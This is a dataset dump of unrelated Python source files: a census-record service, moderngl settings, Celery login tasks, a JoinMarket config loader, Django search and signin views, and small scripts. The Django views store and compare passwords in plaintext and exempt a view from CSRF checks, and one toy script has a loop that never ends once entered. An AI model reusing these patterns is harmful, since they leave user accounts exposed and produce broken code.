add_record_from_upload(self, case, **data):\n data['is_uploaded_census'] = True\n return self.add_record(case, **data)\n\n def add_record(self, case, **data):\n \"\"\"\n Create and add to the DB session, but don't commit or flush the session\n for speed\n \"\"\"\n if case:\n data['case_id'] = case.id\n else:\n # Ad-hoc record\n data['case_id'] = None\n if 'is_uploaded_census' not in data:\n data['is_uploaded_census'] = False\n # TODO: See if there are any other records that need a final \"cleaning\"\n # before being saved\n if 'spouse_birthdate' in data and not data['spouse_birthdate']:\n data['spouse_birthdate'] = None\n if not data.get('occupation_class', None):\n data['occupation_class'] = 'Default'\n record = self.new(**data)\n db.session.add(record)\n return record\n\n def remove_all_for_case(self, case):\n\n # Need to delete all links as well.\n # We do this here as well as CaseService delete_census_record for performance when replacing\n # a very large census.\n from taa.services.enrollments.models import SelfEnrollmentLink, SelfEnrollmentEmailLog\n\n # Delete all self enrollment links and email logs for this case\n db.session.query(SelfEnrollmentLink\n ).filter(SelfEnrollmentLink.census_record.has(CaseCensus.case_id == case.id)\n # It complains about not being able to evaluate the conditions in the Python session, so skip that here.\n ).delete(synchronize_session=False)\n db.session.query(SelfEnrollmentEmailLog\n ).filter(SelfEnrollmentEmailLog.census_record.has(CaseCensus.case_id == case.id)\n # It complains about not being able to evaluate the conditions in the Python session, so skip that here.\n ).delete(synchronize_session=False)\n\n # We don't try to delete for enrollments because we don't allow deleting all the\n # census records if enrollments exist\n\n # Delete the census for this case.\n self.find(case_id=case.id).delete()\n\n db.session.commit()\n\n def update_from_enrollment(self, record, data):\n \"\"\"\n Update the enrollment census with data that was potentially corrected\n while enrolling\n \"\"\"\n\n def convert_smoker_to_y_n(val):\n if val is None:\n return ''\n return 'Y' if val else 'N'\n\n employee = data['employee']\n spouse = data['spouse']\n children = data['children']\n # TODO: See if there are any other records that need a final \"cleaning\"\n # before being saved\n if 'birthdate' in spouse and not spouse['birthdate']:\n # Ensure date is NULL in DB, not \"\"\n data['spouse']['birthdate'] = None\n record.employee_ssn = self.strip_ssn(employee['ssn'])\n record.employee_first = employee['first']\n record.employee_last = employee['last']\n record.employee_gender = employee['gender']\n record.employee_birthdate = employee['birthdate']\n record.employee_email = employee['email']\n record.employee_phone = employee['phone']\n record.employee_street_address = employee['address1']\n record.employee_street_address2 = employee['address2']\n record.employee_city = employee['city']\n record.employee_state = employee['state']\n record.employee_zip = employee['zip']\n record.employee_height_inches = employee['height']\n record.employee_weight_lbs = employee['weight']\n record.employee_smoker = convert_smoker_to_y_n(employee['is_smoker'])\n record.spouse_ssn = self.strip_ssn(spouse['ssn'])\n record.spouse_first = spouse['first']\n record.spouse_last = spouse['last']\n record.spouse_gender = spouse['gender']\n record.spouse_birthdate = spouse['birthdate']\n record.spouse_email = spouse['email']\n record.spouse_phone = spouse['phone']\n record.spouse_street_address = spouse['address1']\n record.spouse_street_address2 = spouse['address2']\n record.spouse_city = spouse['city']\n record.spouse_state = spouse['state']\n record.spouse_zip = spouse['zip']\n record.spouse_height_inches = spouse['height']\n record.spouse_weight_lbs = spouse['weight']\n record.spouse_smoker = convert_smoker_to_y_n(spouse['is_smoker'])\n for i, child in enumerate(children):\n child_num = i + 1\n setattr(record, 'child{}_first'.format(child_num), child['first'])\n setattr(record, 'child{}_last'.format(child_num), child['last'])\n setattr(record, 'child{}_birthdate'.format(child_num),\n child['birthdate'])\n db.session.flush()\n\n def strip_ssn(self, ssn):\n return ssn.strip().replace('-','') if ssn else ''\n\n def serialize_with_tokens(self, case, census_records, url_root):\n # Return record_id, ssn, and self-enroll token. If self-enroll token does not exist, generate it.\n out = []\n for record in census_records:\n\n # Get previously generated link if available\n link = self.self_enrollment_link_service.get_for_census_record(record)\n if link is None:\n # Otherwise generate one\n link = self.self_enrollment_link_service.generate_link(url_root, case, record)\n\n out.append(dict(\n id=record.id,\n ssn=record.employee_ssn,\n self_enroll_url=link.url if link else None,\n ))\n\n return out","sub_path":"taa/services/cases/census_records.py","file_name":"census_records.py","file_ext":"py","file_size_in_byte":10244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"12195652","text":"\"\"\"\nBag of settings values\n\"\"\"\nimport importlib\nimport types\nimport os\n\nfrom collections.abc import Iterable\nfrom pprint import pformat\nfrom typing import Union\n\n\nfrom moderngl_window.conf import default\nfrom moderngl_window.exceptions import ImproperlyConfigured\n\nSETTINGS_ENV_VAR = \"MODERNGL_WINDOW_SETTINGS_MODULE\"\n\n\nclass Settings:\n \"\"\"\n Bag of settings values. New attributes can be freely added runtime.\n Various apply* methods are supplied so the user have full control over how\n settings values are initialized. This is especially useful for more custom usage.\n\n Attribute names must currently be in upper case to be recognized.\n\n Some examples of usage::\n\n from moderngl_window.conf import settings\n\n # Mandatory settings values\n try:\n value = settings.VALUE\n except KeyError:\n raise ValueError(\"This settings value is required\")\n\n # Fallback in code\n value = getattr(settings, 'VALUE', 'default_value')\n\n # Pretty printed string represenation for easy inspection\n print(settings)\n \"\"\"\n def __init__(self):\n \"\"\"Initialize settings with default values\"\"\"\n # Set default entires. Mainly for code completion\n self.WINDOW = dict()\n # Finders\n self.PROGRAM_FINDERS = []\n self.TEXTURE_FINDERS = []\n self.SCENE_FINDERS = []\n self.DATA_FINDERS = []\n # Finder dirs\n self.PROGRAM_DIRS = []\n self.TEXTURE_DIRS = []\n self.SCENE_DIRS = []\n self.DATA_DIRS = []\n # Loaders\n self.PROGRAM_LOADERS = []\n self.TEXTURE_LOADERS = []\n self.SCENE_LOADERS = []\n self.DATA_LOADERS = []\n\n self.apply_default_settings()\n\n def apply_default_settings(self) -> None:\n \"\"\"\n Apply keys and values from the default settings module\n located in this package. This is to ensure we always\n have the minimnal settings for the system to run.\n\n If replacing or customizing the settings class\n you must always apply default settings to ensure\n compatibility when new settings are added.\n \"\"\"\n self.apply_from_module(default)\n\n def apply_settings_from_env(self) -> None:\n \"\"\"\n Apply settings from MODERNGL_WINDOW_SETTINGS_MODULE environment variable.\n If the enviroment variable is undefined no action will be taken.\n Normally this would be used to easily be able to switch between\n different configuration by setting env vars before executing the program.\n\n Example::\n\n import os\n from moderngl_window.conf import settings\n\n os.environ['MODERNGL_WINDOW_SETTINGS_MODULE'] = 'python.path.to.module'\n settings.apply_settings_from_env()\n\n Raises:\n ImproperlyConfigured if the module was not found \n \"\"\"\n name = os.environ.get(SETTINGS_ENV_VAR)\n if name:\n self.apply_from_module_name(name)\n\n def apply_from_module_name(self, settings_module_name: str) -> None:\n \"\"\"\n Apply settings from a python module by supplying the full\n pythonpath to the module.\n\n Args:\n settings_module_name (str): Full python path to the module\n\n Raises:\n ImproperlyConfigured if the module was not found \n \"\"\"\n try:\n module = importlib.import_module(settings_module_name)\n except ModuleNotFoundError as ex:\n raise ImproperlyConfigured(\n \"Settings module '{}' not found. From importlib: {}\".format(\n settings_module_name,\n ex,\n )\n )\n\n self.apply_from_module(module)\n\n def apply_from_dict(self, data: dict) -> None:\n \"\"\"\n Apply settings values from a dictionary\n\n Example::\n\n >> from moderngl_window.conf import settings\n >> settings.apply_dict({'SOME_VALUE': 1})\n >> settings.SOME_VALUE\n 1\n \"\"\"\n self.apply_from_iterable(data.items())\n\n def apply_from_module(self, module: types.ModuleType) -> None:\n \"\"\"\n Apply settings values from a python module\n\n Example::\n\n my_settings.py module containing the following line:\n SOME_VALUE = 1\n\n >> from moderngl_window.conf import settings\n >> import my_settings\n >> settings.apply_module(my_settings)\n >> settings.SOME_VALUE\n 1\n \"\"\"\n self.apply_from_iterable(module.__dict__.items())\n\n def apply_from_cls(self, cls) -> None:\n \"\"\"\n Apply settings values from a class namespace\n\n Example::\n\n >> from moderngl_window.conf import settings\n >> class MySettings:\n >> SOME_VALUE = 1\n >>\n >> settings.apply(MySettings)\n >> settings.SOME_VALUE\n 1\n \"\"\"\n self.apply_from_iterable(cls.__dict__.items())\n\n def apply_from_iterable(self, iterable: Union[Iterable, types.GeneratorType]) -> None:\n \"\"\"\n Apply (key, value) pairs from an interable or generator\n \"\"\"\n if not isinstance(iterable, Iterable) and not isinstance(self, types.GeneratorType):\n raise ValueError(\n \"Input value is not a generator or interable, but of type: {}\".format(type(iterable))\n )\n\n for name, value in iterable:\n if name.isupper():\n setattr(self, name, value)\n\n def __repr__(self) -> str:\n return \"\\n\".join(\"{}={}\".format(k, pformat(v, indent=2)) for k, v in self.__dict__.items() if k.isupper())\n\n\nsettings = Settings()\n","sub_path":"moderngl_window/conf/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"422826825","text":"# coding=utf-8\nfrom __future__ import absolute_import\nimport os\nimport sys\nfrom db.redisCurd import RedisQueue\nfrom send_msg.weinxin import Send_msg\n\nbase_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(base_dir)\nfrom logger.logger import log_v\nfrom celery import Task\n\nfrom platLogin.jdLogin.login import JDLogin # 京东登陆\n\nfrom celery import Celery\n\nrandomQueue = RedisQueue(\"jd_cookie\")\n\ncelery_app = Celery('task')\ncelery_app.config_from_object('celeryConfig')\n\nS = Send_msg()\n\ndl_dict = {\n 'jd': {\n 'cookie': '',\n 'loginClass': 'JDLogin',\n },\n\n}\n\n\n# 三种运行的状态\nclass task_status(Task):\n def on_success(self, retval, task_id, args, kwargs):\n log_v.info('任务信息 -> id:{} , arg:{} , successful ..... Done'.format(task_id, args))\n\n def on_failure(self, exc, task_id, args, kwargs, einfo):\n log_v.error('task id:{} , arg:{} , failed ! error : {}'.format(task_id, args, exc))\n\n def on_retry(self, exc, task_id, args, kwargs, einfo):\n log_v.warning('task id:{} , arg:{} , retry ! info: {}'.format(task_id, args, exc))\n\n\n# 轮询, celery6.0 在 win10 系统可能不太稳定,有时候会有连接断开的情况\n@celery_app.task(base=task_status)\ndef get_cookie_status(platName=\"Erp\"):\n try:\n randomQueue.get_hash(platName).decode()\n log_v.debug(f'[+] 轮询 {platName} 成功 ..... Done')\n return \"Erp 轮询成功\"\n except:\n return \"Erp 轮询失败\"\n\n\n@celery_app.task(base=task_status)\ndef set_plat_cookie(platName, shopId=None):\n log_v.debug(f\"[+] {platName} 正在登陆\")\n core = eval(dl_dict[platName]['loginClass'])(shopId=shopId)\n result = core.run()\n return result\n","sub_path":"tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"630797449","text":"from __future__ import absolute_import, print_function\n\nimport io\nimport logging\nimport threading\nimport os\nimport binascii\nimport sys\n\nfrom ConfigParser import SafeConfigParser, NoOptionError\n\nimport bitcoin as btc\nfrom joinmarket.jsonrpc import JsonRpc\nfrom joinmarket.support import get_log, joinmarket_alert, core_alert, debug_silence\n\nlog = get_log()\n\n\nclass AttributeDict(object):\n \"\"\"\n A class to convert a nested Dictionary into an object with key-values\n accessibly using attribute notation (AttributeDict.attribute) instead of\n key notation (Dict[\"key\"]). This class recursively sets Dicts to objects,\n allowing you to recurse down nested dicts (like: AttributeDict.attr.attr)\n \"\"\"\n\n def __init__(self, **entries):\n self.add_entries(**entries)\n\n def add_entries(self, **entries):\n for key, value in entries.items():\n if type(value) is dict:\n self.__dict__[key] = AttributeDict(**value)\n else:\n self.__dict__[key] = value\n\n def __setattr__(self, name, value):\n if name == 'nickname' and value:\n logFormatter = logging.Formatter(\n ('%(asctime)s [%(threadName)-12.12s] '\n '[%(levelname)-5.5s] %(message)s'))\n fileHandler = logging.FileHandler('logs/{}.log'.format(value))\n fileHandler.setFormatter(logFormatter)\n log.addHandler(fileHandler)\n\n super(AttributeDict, self).__setattr__(name, value)\n\n def __getitem__(self, key):\n \"\"\"\n Provides dict-style access to attributes\n \"\"\"\n return getattr(self, key)\n\nglobal_singleton = AttributeDict()\nglobal_singleton.JM_VERSION = 5\nglobal_singleton.nickname = None\nglobal_singleton.DUST_THRESHOLD = 2730\nglobal_singleton.bc_interface = None\nglobal_singleton.ordername_list = ['absoffer', 'reloffer']\nglobal_singleton.commitment_broadcast_list = ['hp2']\nglobal_singleton.maker_timeout_sec = 60\nglobal_singleton.debug_file_lock = threading.Lock()\nglobal_singleton.debug_file_handle = None\nglobal_singleton.blacklist_file_lock = threading.Lock()\nglobal_singleton.core_alert = core_alert\nglobal_singleton.joinmarket_alert = joinmarket_alert\nglobal_singleton.debug_silence = debug_silence\nglobal_singleton.config = SafeConfigParser()\nglobal_singleton.config_location = 'joinmarket.cfg'\nglobal_singleton.commit_file_location = 'cmttools/commitments.json'\nglobal_singleton.wait_for_commitments = 0\n\ndef jm_single():\n return global_singleton\n\n# FIXME: Add rpc_* options here in the future!\nrequired_options = {'BLOCKCHAIN': ['blockchain_source', 'network'],\n 'MESSAGING': ['host', 'channel', 'port'],\n 'POLICY': ['absurd_fee_per_kb', 'taker_utxo_retries',\n 'taker_utxo_age', 'taker_utxo_amtpercent']}\n\ndefaultconfig = \\\n \"\"\"\n[BLOCKCHAIN]\nblockchain_source = blockr\n#options: blockr, bitcoin-rpc, regtest\n# for instructions on bitcoin-rpc read\n# https://github.com/chris-belcher/joinmarket/wiki/Running-JoinMarket-with-Bitcoin-Core-full-node\nnetwork = mainnet\nrpc_host = localhost\nrpc_port = 8332\nrpc_user = bitcoin\nrpc_password = password\n\n[MESSAGING]\nhost = irc.cyberguerrilla.org\nchannel = joinmarket-pit\nport = 6697\nusessl = true\nsocks5 = false\nsocks5_host = localhost\nsocks5_port = 9050\n#for tor\n#host = 6dvj6v5imhny3anf.onion\n#onion / i2p have their own ports on CGAN\n#port = 6698\n#usessl = true\n#socks5 = true\n\n[TIMEOUT]\nmaker_timeout_sec = 30\nunconfirm_timeout_sec = 90\nconfirm_timeout_hours = 6\n\n[POLICY]\n# for dust sweeping, try merge_algorithm = gradual\n# for more rapid dust sweeping, try merge_algorithm = greedy\n# for most rapid dust sweeping, try merge_algorithm = greediest\n# but don't forget to bump your miner fees!\nmerge_algorithm = default\n# the fee estimate is based on a projection of how many satoshis\n# per kB are needed to get in one of the next N blocks, N set here\n# as the value of 'tx_fees'. This estimate is high if you set N=1, \n# so we choose N=3 for a more reasonable figure,\n# as our default. Note that for clients not using a local blockchain\n# instance, we retrieve an estimate from the API at blockcypher.com, currently.\ntx_fees = 3\n# For users getting transaction fee estimates over an API\n# (currently blockcypher, could be others), place a sanity\n# check limit on the satoshis-per-kB to be paid. This limit\n# is also applied to users using Core, even though Core has its\n# own sanity check limit, which is currently 1,000,000 satoshis.\nabsurd_fee_per_kb = 150000\n# the range of confirmations passed to the `listunspent` bitcoind RPC call\n# 1st value is the inclusive minimum, defaults to one confirmation\n# 2nd value is the exclusive maximum, defaults to most-positive-bignum (Google Me!)\n# leaving it unset or empty defers to bitcoind's default values, ie [1, 9999999]\n#listunspent_args = []\n# that's what you should do, unless you have a specific reason, eg:\n# !!! WARNING !!! CONFIGURING THIS WHILE TAKING LIQUIDITY FROM\n# !!! WARNING !!! THE PUBLIC ORDERBOOK LEAKS YOUR INPUT MERGES\n# spend from unconfirmed transactions: listunspent_args = [0]\n# display only unconfirmed transactions: listunspent_args = [0, 1]\n# defend against small reorganizations: listunspent_args = [3]\n# who is at risk of reorganization?: listunspent_args = [0, 2]\n# NB: using 0 for the 1st value with scripts other than wallet-tool could cause\n# spends from unconfirmed inputs, which may then get malleated or double-spent!\n# other counterparties are likely to reject unconfirmed inputs... don't do it.\n\n#options: self, random-peer, not-self, random-maker\n# self = broadcast transaction with your own ip\n# random-peer = everyone who took part in the coinjoin has a chance of broadcasting\n# not-self = never broadcast with your own ip\n# random-maker = every peer on joinmarket has a chance of broadcasting, including yourself\ntx_broadcast = self\n\n#THE FOLLOWING SETTINGS ARE REQUIRED TO DEFEND AGAINST SNOOPERS.\n#DON'T ALTER THEM UNLESS YOU UNDERSTAND THE IMPLICATIONS.\n\n# number of retries allowed for a specific utxo, to prevent DOS/snooping.\n# Lower settings make snooping more expensive, but also prevent honest users\n# from retrying if an error occurs.\ntaker_utxo_retries = 3\n\n# number of confirmations required for the commitment utxo mentioned above.\n# this effectively rate-limits a snooper.\ntaker_utxo_age = 5\n\n# percentage of coinjoin amount that the commitment utxo must have\n# as a minimum BTC amount. Thus 20 means a 1BTC coinjoin requires the\n# utxo to be at least 0.2 btc.\ntaker_utxo_amtpercent = 20\n\n#Set to 1 to accept broadcast PoDLE commitments from other bots, and\n#add them to your blacklist (only relevant for Makers).\n#There is no way to spoof these values, so the only \"risk\" is that\n#someone fills your blacklist file with a lot of data.\naccept_commitment_broadcasts = 1\n\n#Location of your commitments.json file (stores commitments you've used\n#and those you want to use in future), relative to root joinmarket directory.\ncommit_file_location = cmttools/commitments.json\n\"\"\"\n\n\ndef get_irc_mchannels():\n fields = [(\"host\", str), (\"port\", int), (\"channel\", str),\n (\"usessl\", str), (\"socks5\", str), (\"socks5_host\", str),\n (\"socks5_port\", str)]\n configdata = {}\n for f, t in fields:\n vals = jm_single().config.get(\"MESSAGING\", f).split(\",\")\n if t == str:\n vals = [x.strip() for x in vals]\n else:\n vals = [t(x) for x in vals]\n configdata[f] = vals\n configs = []\n for i in range(len(configdata['host'])):\n newconfig = dict([(x, configdata[x][i]) for x in configdata])\n configs.append(newconfig)\n return configs\n\n\ndef get_config_irc_channel(channel_name):\n channel = \"#\" + channel_name\n if get_network() == 'testnet':\n channel += '-test'\n return channel\n\n\ndef get_network():\n \"\"\"Returns network name\"\"\"\n return global_singleton.config.get(\"BLOCKCHAIN\", \"network\")\n\n\ndef get_p2sh_vbyte():\n if get_network() == 'testnet':\n return 0xc4\n else:\n return 0x05\n\n\ndef get_p2pk_vbyte():\n if get_network() == 'testnet':\n return 0x6f\n else:\n return 0x00\n\n\ndef validate_address(addr):\n try:\n ver = btc.get_version_byte(addr)\n except AssertionError:\n return False, 'Checksum wrong. Typo in address?'\n if ver != get_p2pk_vbyte() and ver != get_p2sh_vbyte():\n return False, 'Wrong address version. Testnet/mainnet confused?'\n if len(btc.b58check_to_bin(addr)) != 20:\n return False, \"Address has correct checksum but wrong length.\"\n return True, 'address validated'\n\ndef donation_address(reusable_donation_pubkey=None):\n if not reusable_donation_pubkey:\n reusable_donation_pubkey = ('02be838257fbfddabaea03afbb9f16e852'\n '9dfe2de921260a5c46036d97b5eacf2a')\n sign_k = binascii.hexlify(os.urandom(32))\n c = btc.sha256(btc.multiply(sign_k,\n reusable_donation_pubkey, True))\n sender_pubkey = btc.add_pubkeys([reusable_donation_pubkey,\n btc.privtopub(c+'01', True)], True)\n sender_address = btc.pubtoaddr(sender_pubkey, get_p2pk_vbyte())\n log.debug('sending coins to ' + sender_address)\n return sender_address, sign_k\n\ndef check_utxo_blacklist(commitment, persist=False):\n \"\"\"Compare a given commitment (H(P2) for PoDLE)\n with the persisted blacklist log file;\n if it has been used before, return False (disallowed),\n else return True.\n If flagged, persist the usage of this commitment to the blacklist file.\n \"\"\"\n #TODO format error checking?\n fname = \"blacklist\"\n if jm_single().config.get(\"BLOCKCHAIN\", \"blockchain_source\") == 'regtest':\n fname += \"_\" + jm_single().nickname\n with jm_single().blacklist_file_lock:\n if os.path.isfile(fname):\n with open(fname, \"rb\") as f:\n blacklisted_commitments = [x.strip() for x in f.readlines()]\n else:\n blacklisted_commitments = []\n if commitment in blacklisted_commitments:\n return False\n elif persist:\n blacklisted_commitments += [commitment]\n with open(fname, \"wb\") as f:\n f.write('\\n'.join(blacklisted_commitments))\n f.flush()\n #If the commitment is new and we are *not* persisting, nothing to do\n #(we only add it to the list on sending io_auth, which represents actual\n #usage).\n return True\n\n\ndef load_program_config():\n #set the location of joinmarket\n jmkt_dir = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))\n log.debug(\"Joinmarket directory is: \" + str(jmkt_dir))\n global_singleton.config.readfp(io.BytesIO(defaultconfig))\n jmkt_config_location = os.path.join(jmkt_dir, global_singleton.config_location)\n loadedFiles = global_singleton.config.read([jmkt_config_location])\n # Create default config file if not found\n if len(loadedFiles) != 1:\n with open(jmkt_config_location, \"w\") as configfile:\n configfile.write(defaultconfig)\n\n # check for sections\n for s in required_options:\n if s not in global_singleton.config.sections():\n raise Exception(\n \"Config file does not contain the required section: \" + s)\n # then check for specific options\n for k, v in required_options.iteritems():\n for o in v:\n if o not in global_singleton.config.options(k):\n raise Exception(\n \"Config file does not contain the required option: \" + o +\\\n \" in section: \" + k)\n\n try:\n global_singleton.maker_timeout_sec = global_singleton.config.getint(\n 'TIMEOUT', 'maker_timeout_sec')\n except NoOptionError:\n log.debug('TIMEOUT/maker_timeout_sec not found in .cfg file, '\n 'using default value')\n\n # configure the interface to the blockchain on startup\n global_singleton.bc_interface = get_blockchain_interface_instance(\n global_singleton.config)\n #set the location of the commitments file\n try:\n global_singleton.commit_file_location = global_singleton.config.get(\n \"POLICY\", \"commit_file_location\")\n except NoOptionError:\n log.debug(\"No commitment file location in config, using default \"\n \"location cmttools/commitments.json\")\n btc.set_commitment_file(os.path.join(jmkt_dir,\n global_singleton.commit_file_location))\n\ndef get_blockchain_interface_instance(_config):\n # todo: refactor joinmarket module to get rid of loops\n # importing here is necessary to avoid import loops\n from joinmarket.blockchaininterface import BitcoinCoreInterface, \\\n RegtestBitcoinCoreInterface, BlockrInterface\n from joinmarket.blockchaininterface import CliJsonRpc\n\n source = _config.get(\"BLOCKCHAIN\", \"blockchain_source\")\n network = get_network()\n testnet = network == 'testnet'\n if source == 'bitcoin-rpc':\n rpc_host = _config.get(\"BLOCKCHAIN\", \"rpc_host\")\n rpc_port = _config.get(\"BLOCKCHAIN\", \"rpc_port\")\n rpc_user = _config.get(\"BLOCKCHAIN\", \"rpc_user\")\n rpc_password = _config.get(\"BLOCKCHAIN\", \"rpc_password\")\n rpc = JsonRpc(rpc_host, rpc_port, rpc_user, rpc_password)\n bc_interface = BitcoinCoreInterface(rpc, network)\n elif source == 'json-rpc':\n bitcoin_cli_cmd = _config.get(\"BLOCKCHAIN\",\n \"bitcoin_cli_cmd\").split(' ')\n rpc = CliJsonRpc(bitcoin_cli_cmd, testnet)\n bc_interface = BitcoinCoreInterface(rpc, network)\n elif source == 'regtest':\n rpc_host = _config.get(\"BLOCKCHAIN\", \"rpc_host\")\n rpc_port = _config.get(\"BLOCKCHAIN\", \"rpc_port\")\n rpc_user = _config.get(\"BLOCKCHAIN\", \"rpc_user\")\n rpc_password = _config.get(\"BLOCKCHAIN\", \"rpc_password\")\n rpc = JsonRpc(rpc_host, rpc_port, rpc_user, rpc_password)\n bc_interface = RegtestBitcoinCoreInterface(rpc)\n elif source == 'blockr':\n bc_interface = BlockrInterface(testnet)\n else:\n raise ValueError(\"Invalid blockchain source\")\n return bc_interface\n","sub_path":"joinmarket/configure.py","file_name":"configure.py","file_ext":"py","file_size_in_byte":14249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"245360938","text":"import string\r\n\r\n\r\nalpha = string.ascii_uppercase + string.ascii_lowercase + string.digits + \"+/\"\r\nst = str(input(\"Input string to be ciphered: \"))\r\nlst = \" \".join(format(ord(x),\"b\") for x in st).split(\" \")\r\nprint(lst)\r\naccess = None\r\nfor items in lst:\r\n print(items)\r\n if len(items) != 7:\r\n access = True\r\n for letters in items:\r\n while access:\r\n letters += \"0\"\r\n else:\r\n access = False\r\n\r\nprint(lst)","sub_path":"testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"584767511","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def isCousins(self, root: TreeNode, x: int, y: int) -> bool:\n queue = deque([root])\n while queue:\n siblings, cousins = False, False\n nodesAtThisDepth = len(queue)\n for _ in range(nodesAtThisDepth):\n node = queue.popleft()\n if node is None:\n siblings = False\n else:\n if node.val == x or node.val == y:\n if not cousins:\n cousins, siblings = True, True\n else:\n return not siblings\n queue.append(node.left) if node.left else None\n queue.append(node.right) if node.right else None\n queue.append(None)\n if cousins:\n return False\n return False","sub_path":"LeetCode/Cousins in Binary Tree.py","file_name":"Cousins in Binary Tree.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"537235162","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.http import HttpResponse\nfrom django.template import RequestContext, loader\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom django.shortcuts import redirect\n\n\n# Exception # \nfrom django.core.exceptions import ObjectDoesNotExist\n\n# Django model & form #\nfrom google_with_mm_app.form import SearchKeyword\nfrom google_with_mm_app.models import TblUserInfo\nfrom google_with_mm_app.form import SigninForm\nfrom google_with_mm_app.form import SignupForm\n\n# Getting and Pasing json #\nimport urllib.request\nimport urllib.parse\nimport json\n\n\n# Create your views here.\ndef test(request):\n context={}\n return render(request, 'google_with_mm_app/test.html', context)\n\n@csrf_exempt\ndef search_main(request):\n if request.method == 'POST':\n #form=SearchKeyword(request.POST)\n keyword = request.POST.get('keyword')\n start = request.POST.get('start')\n rsz = request.POST.get('rsz')\n print ('keyword: '+keyword)\n print ('start:'+start)\n print ('rsz:'+rsz)\n \n obj = get_search_result(keyword, start, rsz, '60.173.26.241')\n \n return HttpResponse(\n json.dumps(obj),\n content_type=\"application/json\"\n )\n \n else: \n #return HttpResponse(\n # json.dumps({\"nothing to see\": \"this isn't happening\"}),\n # content_type=\"application/json\"\n #)\n\n context={}\n return render(request, 'google_with_mm_app/search_main.html', context)\n\n\ndef get_search_result(keyword, start, rsz,user_ip): \n \n# keyword=keyword.replace( \" \", \"+\")\n keyword=urllib.parse.quote(keyword)\n url = ('https://ajax.googleapis.com/ajax/services/search/web'\n '?v=1.0&q='\n +keyword\n +'&rsz='\n +rsz\n +'&start='\n +start\n +'&userip='\n +user_ip)\n print (\"get_search_result| keyword url | \"+url)\n request = urllib.request.Request(url)\n response = urllib.request.urlopen(request)\n ## urlopen isn't available global language. ## -- 20151007\n encoding = response.headers.get_content_charset()\n obj=json.loads(response.read().decode(encoding))\n \n print (obj)\n obj_ret= {}\n # JSON TEST CODE #\n results_num = len(obj['responseData']['results'])\n\n #for i in range(0, results_num):\n # obj_ret[i] = obj['responseData']['results'][i]\n # print (obj_ret)\n\n obj_ret = obj['responseData']\n return obj_ret\n\n\ndef signup(request):\n if request.method == 'POST': \n form = SignupForm(request.POST)\n print(form) \n if form.is_valid():\n\n v_usr_id = request.POST['usr_id']\n v_usr_pwd = request.POST['usr_pwd']\n v_usr_nm = request.POST['usr_nm']\n v_usr_email = request.POST['usr_email']\n print (v_usr_id)\n print (v_usr_pwd)\n print (v_usr_nm)\n print (v_usr_email)\n \n m = TblUserInfo(usr_id=v_usr_id, usr_pwd=v_usr_pwd, usr_nm=v_usr_nm, usr_email=v_usr_email)\n m.save(force_insert=True)\n \n request.session['usr_nm'] = m.usr_nm\n request.session['usr_id'] = m.usr_id\n request.session.get_expire_at_browser_close()\n\n print(request.session['usr_nm'])\n context = {}\n\n return redirect('/search/')\n #return render(request, 'google_with_mm_app/search_main.html', context) \n else:\n context = {\n 'message' : 'Signup Failed.. Sorry. Please fill all textbox!'\n }\n return render(request, 'google_with_mm_app/signup.html', context) \n else:\n context={\n 'message' : 'Welcome! Please fill all textbox to signup'\n }\n return render(request, 'google_with_mm_app/signup.html', context) \n\ndef signin(request):\n\n form = SigninForm(request.POST)\n print(form)\n if form.is_valid():\n try :\n m = TblUserInfo.objects.get(usr_id=request.POST['usr_id'])\n except ObjectDoesNotExist:\n context = {\n 'message': 'Your ID does not exist or password is incorrect!'\n }\n return render(request, 'google_with_mm_app/signin.html', context)\n\n if m.usr_pwd == request.POST['usr_pwd']:\n print(m.usr_nm)\n request.session['usr_nm'] = m.usr_nm\n request.session['usr_id'] = m.usr_id\n request.session.get_expire_at_browser_close()\n\n print(request.session['usr_nm'])\n context = {}\n #return render(request, 'google_with_mm_app/search_main.html', context)\n return redirect('/search/')\n\n else:\n context = {\n 'message': 'Your ID does not exist or password is incorrect!'\n }\n\n return render(request, 'google_with_mm_app/signin.html', context)\n\n else:\n context = {'message': 'Please Login !'}\n return render(request, 'google_with_mm_app/signin.html', context) \n\ndef signout(request):\n \n try:\n del request.session['usr_nm']\n del request.session['usr_id']\n except KeyError:\n pass\n\n context={ \n 'message' : 'Signed Out !' \n }\n return redirect('/search/')\n #return render(request, 'google_with_mm_app/search_main.html', context)\n\n","sub_path":"google_with_mm/google_with_mm_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"407992736","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\nimport time\n\ndef auth_api_login(func):\n \"\"\"\n :param func:\n :return:\n \"\"\"\n def __(torn_self, *args, **kwargs):\n user_name = torn_self.get_secure_cookie('user_name')\n edu_session = torn_self.get_argument('edu_session', '')\n if not user_name and not edu_session:\n torn_self.set_status(401)\n return\n func(torn_self, *args, **kwargs)\n return __\n\ncom_cookie_time = 3600\ndef set_edu_cookie(set_obj, user_name, user_level, school_id=None):\n # 设置cookie\n set_obj.set_secure_cookie(\"user_name\", user_name, expires=time.time() + com_cookie_time)\n set_obj.set_secure_cookie(\"user_level\", str(user_level), expires=time.time() + com_cookie_time)\n if school_id:\n set_obj.set_secure_cookie(\"school_id\", school_id, expires=time.time() + 